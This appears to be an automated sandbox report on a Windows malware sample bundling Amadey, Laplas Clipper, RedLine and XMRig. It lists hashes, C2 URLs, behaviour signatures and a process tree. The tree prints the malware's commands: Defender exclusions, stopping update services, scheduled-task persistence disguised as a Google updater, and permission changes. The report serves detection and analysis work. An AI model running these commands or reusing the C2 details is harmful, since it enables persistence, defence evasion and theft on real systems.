Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-09-2023 15:52

General

  • Target

    tmp.exe

  • Size

    4.0MB

  • MD5

    229df5fd5f850d26bb0b0a05f0918e9a

  • SHA1

    400871984e6d833956f06734d7be5d8b7c8cb997

  • SHA256

    4b9d1edaea936f67387f42846014802d768ee548af10116d09c2ae253a61cdbd

  • SHA512

    1d1f829572daa2a90311f3db455970043a95928c10bad066b51af2aef24d1e72fbe45cbecb61d682414c0d511d104af93826f594f627474c7dd1d142bd306756

  • SSDEEP

    98304:dCUPT4Mzeh+6D6UH+phuRO5bezZvSZ0NOk/Lg8eSjD:dCwe4O7H45bezZvIaOk/LgbSjD

Malware Config

Extracted

Family

amadey

Version

3.80

C2

http://45.15.156.208/jd9dd3Vw/index.php

http://second.amadgood.com/jd9dd3Vw/index.php

Attributes
  • install_dir

    eb0f58bce7

  • install_file

    oneetx.exe

  • strings_key

    2b74c848ebcfe9bcac3cd4aec559934c

rc4.plain

Extracted

Family

laplas

C2

http://206.189.229.43

Attributes
  • api_key

    f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • VMProtect packed file 7 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3168
      • C:\Users\Admin\AppData\Local\Temp\tmp.exe
        "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
        2⤵
        • Checks computer location settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2024
        • C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
          "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2820
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F
            4⤵
            • Creates scheduled task(s)
            PID:4836
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4940
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              5⤵
                PID:3096
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "oneetx.exe" /P "Admin:N"
                5⤵
                  PID:4704
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "oneetx.exe" /P "Admin:R" /E
                  5⤵
                    PID:4572
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "..\eb0f58bce7" /P "Admin:N"
                    5⤵
                      PID:1376
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      5⤵
                        PID:4356
                      • C:\Windows\SysWOW64\cacls.exe
                        CACLS "..\eb0f58bce7" /P "Admin:R" /E
                        5⤵
                          PID:1972
                      • C:\Users\Admin\AppData\Local\Temp\1000152001\taskmask.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000152001\taskmask.exe"
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:376
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                          5⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3316
                      • C:\Users\Admin\AppData\Local\Temp\1000153101\rdpcllp.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000153101\rdpcllp.exe"
                        4⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1960
                      • C:\Users\Admin\AppData\Local\Temp\1000154001\taskhostclp.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000154001\taskhostclp.exe"
                        4⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of WriteProcessMemory
                        PID:4508
                        • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
                          C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
                          5⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1972
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5012
                  • C:\Windows\System32\cmd.exe
                    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2540
                    • C:\Windows\System32\sc.exe
                      sc stop UsoSvc
                      3⤵
                      • Launches sc.exe
                      PID:3716
                    • C:\Windows\System32\sc.exe
                      sc stop WaaSMedicSvc
                      3⤵
                      • Launches sc.exe
                      PID:3372
                    • C:\Windows\System32\sc.exe
                      sc stop wuauserv
                      3⤵
                      • Launches sc.exe
                      PID:1916
                    • C:\Windows\System32\sc.exe
                      sc stop bits
                      3⤵
                      • Launches sc.exe
                      PID:4216
                    • C:\Windows\System32\sc.exe
                      sc stop dosvc
                      3⤵
                      • Launches sc.exe
                      PID:648
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4656
                  • C:\Windows\System32\cmd.exe
                    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4420
                    • C:\Windows\System32\powercfg.exe
                      powercfg /x -hibernate-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4812
                    • C:\Windows\System32\powercfg.exe
                      powercfg /x -hibernate-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1844
                    • C:\Windows\System32\powercfg.exe
                      powercfg /x -standby-timeout-ac 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:492
                    • C:\Windows\System32\powercfg.exe
                      powercfg /x -standby-timeout-dc 0
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4516
                  • C:\Windows\System32\schtasks.exe
                    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                    2⤵
                      PID:4392
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                      2⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5036
                    • C:\Windows\System32\cmd.exe
                      C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4216
                      • C:\Windows\System32\sc.exe
                        sc stop UsoSvc
                        3⤵
                        • Launches sc.exe
                        PID:1340
                      • C:\Windows\System32\sc.exe
                        sc stop WaaSMedicSvc
                        3⤵
                        • Launches sc.exe
                        PID:2304
                      • C:\Windows\System32\sc.exe
                        sc stop wuauserv
                        3⤵
                        • Launches sc.exe
                        PID:4996
                      • C:\Windows\System32\sc.exe
                        sc stop bits
                        3⤵
                        • Launches sc.exe
                        PID:5052
                      • C:\Windows\System32\sc.exe
                        sc stop dosvc
                        3⤵
                        • Launches sc.exe
                        PID:3980
                    • C:\Windows\System32\cmd.exe
                      C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                      2⤵
                        PID:1084
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          3⤵
                            PID:4220
                          • C:\Windows\System32\powercfg.exe
                            powercfg /x -hibernate-timeout-dc 0
                            3⤵
                              PID:2176
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -standby-timeout-ac 0
                              3⤵
                                PID:4804
                              • C:\Windows\System32\powercfg.exe
                                powercfg /x -standby-timeout-dc 0
                                3⤵
                                  PID:1948
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                2⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4508
                              • C:\Windows\System32\conhost.exe
                                C:\Windows\System32\conhost.exe
                                2⤵
                                  PID:5004
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3732
                              • C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
                                C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
                                1⤵
                                • Executes dropped EXE
                                PID:1052
                              • C:\Program Files\Google\Chrome\updater.exe
                                "C:\Program Files\Google\Chrome\updater.exe"
                                1⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4752

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Program Files\Google\Chrome\updater.exe

                                Filesize

                                7.0MB

                                MD5

                                dfdb092fd460c1d4e5c5853bccdd08ca

                                SHA1

                                766f11d4b12ae5f196b76581ed6a8930caa609ce

                                SHA256

                                5cb22ccee1a8b75c76ff734ade511c73be1bb0e2f81fb463ccd85058c9bf028f

                                SHA512

                                6e82fa11b7d547f5228c0441ee847113f581508ae367d7345b304fe3877be255c16ab16dd66bb0c42ae64173d613b36dbbda419b35fea0587e5c34f76aed012e

                              • C:\Program Files\Google\Chrome\updater.exe

                                Filesize

                                7.0MB

                                MD5

                                dfdb092fd460c1d4e5c5853bccdd08ca

                                SHA1

                                766f11d4b12ae5f196b76581ed6a8930caa609ce

                                SHA256

                                5cb22ccee1a8b75c76ff734ade511c73be1bb0e2f81fb463ccd85058c9bf028f

                                SHA512

                                6e82fa11b7d547f5228c0441ee847113f581508ae367d7345b304fe3877be255c16ab16dd66bb0c42ae64173d613b36dbbda419b35fea0587e5c34f76aed012e

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                944B

                                MD5

                                59d97011e091004eaffb9816aa0b9abd

                                SHA1

                                1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

                                SHA256

                                18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

                                SHA512

                                d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

                              • C:\Users\Admin\AppData\Local\Temp\1000152001\taskmask.exe

                                Filesize

                                2.0MB

                                MD5

                                764d12e322e104fe4df6085e89d53ed2

                                SHA1

                                a1a7103d1619d0512fc49931f8e02d4260c0bf22

                                SHA256

                                dd40d0e409908a22d3a8a02209131e6fc19e761d491a338282fc11479a73fe36

                                SHA512

                                4eba9c0eb377814886b8f9eb2182c55c5e291647948b0ada0b102052cbdb2984d3def87302bc7c460ea3e36e73a86cc282eb6371c03c652cd1b9b2e433aaf25e

                              • C:\Users\Admin\AppData\Local\Temp\1000152001\taskmask.exe

                                Filesize

                                2.0MB

                                MD5

                                764d12e322e104fe4df6085e89d53ed2

                                SHA1

                                a1a7103d1619d0512fc49931f8e02d4260c0bf22

                                SHA256

                                dd40d0e409908a22d3a8a02209131e6fc19e761d491a338282fc11479a73fe36

                                SHA512

                                4eba9c0eb377814886b8f9eb2182c55c5e291647948b0ada0b102052cbdb2984d3def87302bc7c460ea3e36e73a86cc282eb6371c03c652cd1b9b2e433aaf25e

                              • C:\Users\Admin\AppData\Local\Temp\1000152001\taskmask.exe

                                Filesize

                                2.0MB

                                MD5

                                764d12e322e104fe4df6085e89d53ed2

                                SHA1

                                a1a7103d1619d0512fc49931f8e02d4260c0bf22

                                SHA256

                                dd40d0e409908a22d3a8a02209131e6fc19e761d491a338282fc11479a73fe36

                                SHA512

                                4eba9c0eb377814886b8f9eb2182c55c5e291647948b0ada0b102052cbdb2984d3def87302bc7c460ea3e36e73a86cc282eb6371c03c652cd1b9b2e433aaf25e

                              • C:\Users\Admin\AppData\Local\Temp\1000153101\rdpcllp.exe

                                Filesize

                                7.0MB

                                MD5

                                dfdb092fd460c1d4e5c5853bccdd08ca

                                SHA1

                                766f11d4b12ae5f196b76581ed6a8930caa609ce

                                SHA256

                                5cb22ccee1a8b75c76ff734ade511c73be1bb0e2f81fb463ccd85058c9bf028f

                                SHA512

                                6e82fa11b7d547f5228c0441ee847113f581508ae367d7345b304fe3877be255c16ab16dd66bb0c42ae64173d613b36dbbda419b35fea0587e5c34f76aed012e

                              • C:\Users\Admin\AppData\Local\Temp\1000153101\rdpcllp.exe

                                Filesize

                                7.0MB

                                MD5

                                dfdb092fd460c1d4e5c5853bccdd08ca

                                SHA1

                                766f11d4b12ae5f196b76581ed6a8930caa609ce

                                SHA256

                                5cb22ccee1a8b75c76ff734ade511c73be1bb0e2f81fb463ccd85058c9bf028f

                                SHA512

                                6e82fa11b7d547f5228c0441ee847113f581508ae367d7345b304fe3877be255c16ab16dd66bb0c42ae64173d613b36dbbda419b35fea0587e5c34f76aed012e

                              • C:\Users\Admin\AppData\Local\Temp\1000153101\rdpcllp.exe

                                Filesize

                                7.0MB

                                MD5

                                dfdb092fd460c1d4e5c5853bccdd08ca

                                SHA1

                                766f11d4b12ae5f196b76581ed6a8930caa609ce

                                SHA256

                                5cb22ccee1a8b75c76ff734ade511c73be1bb0e2f81fb463ccd85058c9bf028f

                                SHA512

                                6e82fa11b7d547f5228c0441ee847113f581508ae367d7345b304fe3877be255c16ab16dd66bb0c42ae64173d613b36dbbda419b35fea0587e5c34f76aed012e

                              • C:\Users\Admin\AppData\Local\Temp\1000154001\taskhostclp.exe

                                Filesize

                                3.0MB

                                MD5

                                02208e4168793ef72942aa31c1ae8642

                                SHA1

                                449b579d0b642ca43419c0687cc799afe5aa9194

                                SHA256

                                22b198c5fc1e073ef00fc7a44ca20db5f44630f4e0e746abcf2060207d7129d9

                                SHA512

                                f50be51f1ff3da3da34d4c819021686842d024476993031e56313fde1aded427e9e81d0cb2956c98d29839fac140597a8e1b1cbd89a58c481be70ce88ce5507f

                              • C:\Users\Admin\AppData\Local\Temp\1000154001\taskhostclp.exe

                                Filesize

                                3.0MB

                                MD5

                                02208e4168793ef72942aa31c1ae8642

                                SHA1

                                449b579d0b642ca43419c0687cc799afe5aa9194

                                SHA256

                                22b198c5fc1e073ef00fc7a44ca20db5f44630f4e0e746abcf2060207d7129d9

                                SHA512

                                f50be51f1ff3da3da34d4c819021686842d024476993031e56313fde1aded427e9e81d0cb2956c98d29839fac140597a8e1b1cbd89a58c481be70ce88ce5507f

                              • C:\Users\Admin\AppData\Local\Temp\1000154001\taskhostclp.exe

                                Filesize

                                3.0MB

                                MD5

                                02208e4168793ef72942aa31c1ae8642

                                SHA1

                                449b579d0b642ca43419c0687cc799afe5aa9194

                                SHA256

                                22b198c5fc1e073ef00fc7a44ca20db5f44630f4e0e746abcf2060207d7129d9

                                SHA512

                                f50be51f1ff3da3da34d4c819021686842d024476993031e56313fde1aded427e9e81d0cb2956c98d29839fac140597a8e1b1cbd89a58c481be70ce88ce5507f

                              • C:\Users\Admin\AppData\Local\Temp\474409663223

                                Filesize

                                74KB

                                MD5

                                42a1cd6134bcd2bbf456607211b03257

                                SHA1

                                a17c5b728489155740a8f87ef620596d3e79134f

                                SHA256

                                c44ab4f98668d03ecd32ccf5a0694556e5960416d268ea17bb7839b33de1f8c6

                                SHA512

                                932dcc2cf6ca550a6efa319763f9ab65c81ebbebc21ff22c62613c804b0ce12ef5e77729bfea8afc67478748f11ace625f2413300e6fa9932ad88444b7639f5a

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dr2ghqnh.x3x.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

                                Filesize

                                4.0MB

                                MD5

                                229df5fd5f850d26bb0b0a05f0918e9a

                                SHA1

                                400871984e6d833956f06734d7be5d8b7c8cb997

                                SHA256

                                4b9d1edaea936f67387f42846014802d768ee548af10116d09c2ae253a61cdbd

                                SHA512

                                1d1f829572daa2a90311f3db455970043a95928c10bad066b51af2aef24d1e72fbe45cbecb61d682414c0d511d104af93826f594f627474c7dd1d142bd306756

                              • C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

                                Filesize

                                4.0MB

                                MD5

                                229df5fd5f850d26bb0b0a05f0918e9a

                                SHA1

                                400871984e6d833956f06734d7be5d8b7c8cb997

                                SHA256

                                4b9d1edaea936f67387f42846014802d768ee548af10116d09c2ae253a61cdbd

                                SHA512

                                1d1f829572daa2a90311f3db455970043a95928c10bad066b51af2aef24d1e72fbe45cbecb61d682414c0d511d104af93826f594f627474c7dd1d142bd306756

                              • C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

                                Filesize

                                4.0MB

                                MD5

                                229df5fd5f850d26bb0b0a05f0918e9a

                                SHA1

                                400871984e6d833956f06734d7be5d8b7c8cb997

                                SHA256

                                4b9d1edaea936f67387f42846014802d768ee548af10116d09c2ae253a61cdbd

                                SHA512

                                1d1f829572daa2a90311f3db455970043a95928c10bad066b51af2aef24d1e72fbe45cbecb61d682414c0d511d104af93826f594f627474c7dd1d142bd306756

                              • C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

                                Filesize

                                4.0MB

                                MD5

                                229df5fd5f850d26bb0b0a05f0918e9a

                                SHA1

                                400871984e6d833956f06734d7be5d8b7c8cb997

                                SHA256

                                4b9d1edaea936f67387f42846014802d768ee548af10116d09c2ae253a61cdbd

                                SHA512

                                1d1f829572daa2a90311f3db455970043a95928c10bad066b51af2aef24d1e72fbe45cbecb61d682414c0d511d104af93826f594f627474c7dd1d142bd306756

                              • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

                                Filesize

                                765.0MB

                                MD5

                                f0efd37d2f320a39b988e39665f4a2b9

                                SHA1

                                81a19dfa1d86cda0b2d10cde0a87e6e3475ace16

                                SHA256

                                85a29c9e7819a889f342d8b63a89986e06cb4e74f4c702d9910b762557e0af93

                                SHA512

                                993f1ef72b6e53145231cd9fb634d7531bb64dbb1b2ae269d362943b1524288cf0ee750f3aeadac3bbab869eb43074991bbb46cbd91bf715ba59f6401b429329

                              • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

                                Filesize

                                765.0MB

                                MD5

                                f0efd37d2f320a39b988e39665f4a2b9

                                SHA1

                                81a19dfa1d86cda0b2d10cde0a87e6e3475ace16

                                SHA256

                                85a29c9e7819a889f342d8b63a89986e06cb4e74f4c702d9910b762557e0af93

                                SHA512

                                993f1ef72b6e53145231cd9fb634d7531bb64dbb1b2ae269d362943b1524288cf0ee750f3aeadac3bbab869eb43074991bbb46cbd91bf715ba59f6401b429329

                              • C:\Windows\System32\drivers\etc\hosts

                                Filesize

                                3KB

                                MD5

                                00930b40cba79465b7a38ed0449d1449

                                SHA1

                                4b25a89ee28b20ba162f23772ddaf017669092a5

                                SHA256

                                eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                                SHA512

                                cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                Filesize

                                4KB

                                MD5

                                bdb25c22d14ec917e30faf353826c5de

                                SHA1

                                6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                                SHA256

                                e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                                SHA512

                                b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                1KB

                                MD5

                                4af092e31db1384ca141f50e2754eeea

                                SHA1

                                5e6e8c987ed9df9c9bb373227c2c8dcfde24ccef

                                SHA256

                                60e3e9177b248839a957af720477f1389a10334123eb6cb12ae347e40ab53f53

                                SHA512

                                a4ac31719fcb1b0b594806b5d56fc2c335de7901538542aeffe0f78b9710aa5aecc78146ab5d131d32b56405df59c4f2be50bcafb7494d4996c154b39f8bf4fd

                              • memory/376-53-0x0000000000B30000-0x0000000000D40000-memory.dmp

                                Filesize

                                2.1MB

                              • memory/376-47-0x0000000000B30000-0x0000000000D40000-memory.dmp

                                Filesize

                                2.1MB

                              • memory/1052-139-0x0000000000B30000-0x0000000001185000-memory.dmp

                                Filesize

                                6.3MB

                              • memory/1960-217-0x00007FF694F90000-0x00007FF6959B1000-memory.dmp

                                Filesize

                                10.1MB

                              • memory/1960-86-0x000001747FAD0000-0x000001747FB10000-memory.dmp

                                Filesize

                                256KB

                              • memory/1960-99-0x000001747FAD0000-0x000001747FB10000-memory.dmp

                                Filesize

                                256KB

                              • memory/1960-111-0x000001747FB30000-0x000001747FB31000-memory.dmp

                                Filesize

                                4KB

                              • memory/1960-85-0x00007FF694F90000-0x00007FF6959B1000-memory.dmp

                                Filesize

                                10.1MB

                              • memory/1960-81-0x00007FF694F90000-0x00007FF6959B1000-memory.dmp

                                Filesize

                                10.1MB

                              • memory/1960-133-0x00007FF694F90000-0x00007FF6959B1000-memory.dmp

                                Filesize

                                10.1MB

                              • memory/1960-219-0x00007FF694F90000-0x00007FF6959B1000-memory.dmp

                                Filesize

                                10.1MB

                              • memory/1960-137-0x000001747FAD0000-0x000001747FB10000-memory.dmp

                                Filesize

                                256KB

                              • memory/1972-203-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-195-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-341-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-337-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-188-0x00007FF916BE0000-0x00007FF916EA9000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/1972-323-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-317-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-295-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-274-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-258-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-242-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-236-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-235-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-221-0x00007FF919010000-0x00007FF919205000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/1972-218-0x00007FF916BE0000-0x00007FF916EA9000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/1972-216-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-209-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-189-0x00007FF916BE0000-0x00007FF916EA9000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/1972-202-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

                              • memory/1972-201-0x0000000000790000-0x00000000010AD000-memory.dmp

                                Filesize

                                9.1MB

